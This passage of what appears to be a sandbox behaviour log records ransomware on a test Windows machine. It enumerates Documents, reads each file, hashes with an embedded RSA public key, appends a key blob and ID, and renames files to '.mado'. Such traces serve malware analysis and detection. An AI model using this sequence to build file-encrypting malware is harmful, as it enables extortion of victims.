halpmcxz\\documents\\mh0lfhcedubr9.xlsx.mado")) returned 1 [0204.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b70b68 | out: hHeap=0x2c0000) returned 1 [0204.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.080] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef090 | out: hHeap=0x2c0000) returned 1 [0204.081] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0204.081] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0204.081] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0204.081] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0204.081] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34fab0e0, ftCreationTime.dwHighDateTime=0x1d5e3e8, ftLastAccessTime.dwLowDateTime=0xa906cb70, ftLastAccessTime.dwHighDateTime=0x1d5a06a, ftLastWriteTime.dwLowDateTime=0xa906cb70, ftLastWriteTime.dwHighDateTime=0x1d5a06a, nFileSizeHigh=0x0, nFileSizeLow=0x11b42, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ojVoPqmMcqQsP E.docx", cAlternateFileName="OJVOPQ~1.DOC")) returned 1 [0204.081] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ojVoPqmMcqQsP E.docx") returned=".docx" [0204.081] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ojVoPqmMcqQsP E.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ojvopqmmcqqsp e.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.081] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=72514) returned 1 [0204.081] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.084] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x11b1c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.084] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.085] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x11b42, lpOverlapped=0x0) returned 1 [0204.089] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.089] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.089] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.089] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.090] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.090] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.090] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.090] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.090] GetLastError () returned 0x0 [0204.090] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.090] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0204.090] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.090] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.090] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.091] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c6a8 [0204.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b72b68 [0204.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe040 | out: hHeap=0x2c0000) returned 1 [0204.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe058 | out: hHeap=0x2c0000) returned 1 [0204.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe088 | out: hHeap=0x2c0000) returned 1 [0204.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b68 | out: hHeap=0x2c0000) returned 1 [0204.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe088 [0204.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0204.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe058 [0204.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0204.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe040 [0204.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6bb80 [0204.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6bc98 [0204.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0204.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe058 | out: hHeap=0x2c0000) returned 1 [0204.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe040 | out: hHeap=0x2c0000) returned 1 [0204.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe088 | out: hHeap=0x2c0000) returned 1 [0204.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0204.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0204.092] GetCurrentThreadId () returned 0x600 [0204.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6eb80 [0204.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b70b80 [0204.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0204.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.092] GetCurrentThreadId () returned 0x600 [0204.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0204.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3578 [0204.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6f0a8 [0204.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe088 [0204.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe040 [0204.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe058 [0204.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe028 [0204.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe0a0 [0204.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe070 [0204.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe0b8 [0204.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0204.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0204.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe040 | out: hHeap=0x2c0000) returned 1 [0204.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe040 [0204.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0204.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe088 | out: hHeap=0x2c0000) returned 1 [0204.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bb80 [0204.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe0b8 | out: hHeap=0x2c0000) returned 1 [0204.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x3b72b68 [0204.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0204.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6bdb0 [0204.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0204.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bec8 [0204.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe040 | out: hHeap=0x2c0000) returned 1 [0204.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b72d80 [0204.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0204.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0204.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0204.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6efa0 | out: hHeap=0x2c0000) returned 1 [0204.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec88 | out: hHeap=0x2c0000) returned 1 [0204.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0204.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0204.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b68 | out: hHeap=0x2c0000) returned 1 [0204.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72d80 | out: hHeap=0x2c0000) returned 1 [0204.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bdb0 | out: hHeap=0x2c0000) returned 1 [0204.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0204.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe070 | out: hHeap=0x2c0000) returned 1 [0204.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0204.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe0a0 | out: hHeap=0x2c0000) returned 1 [0204.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe058 | out: hHeap=0x2c0000) returned 1 [0204.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe028 | out: hHeap=0x2c0000) returned 1 [0204.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0204.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0204.095] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x11b42, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.095] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.096] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.096] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.096] CloseHandle (hObject=0x63c) returned 1 [0204.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x3b72b68 [0204.097] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ojVoPqmMcqQsP E.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ojvopqmmcqqsp e.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ojVoPqmMcqQsP E.docx.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ojvopqmmcqqsp e.docx.mado")) returned 1 [0204.098] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0204.098] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2c88 [0204.098] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2d78 [0204.098] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2b20 [0204.099] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e65bca0, ftCreationTime.dwHighDateTime=0x1d5bcf2, ftLastAccessTime.dwLowDateTime=0x98358b60, ftLastAccessTime.dwHighDateTime=0x1d59e17, ftLastWriteTime.dwLowDateTime=0x98358b60, ftLastWriteTime.dwHighDateTime=0x1d59e17, nFileSizeHigh=0x0, nFileSizeLow=0xb574, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="owDXXAnogti1-3p.xlsx", cAlternateFileName="OWDXXA~1.XLS")) returned 1 [0204.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff260 [0204.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2ef090 [0204.099] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\owDXXAnogti1-3p.xlsx") returned=".xlsx" [0204.099] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\owDXXAnogti1-3p.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\owdxxanogti1-3p.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.100] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: 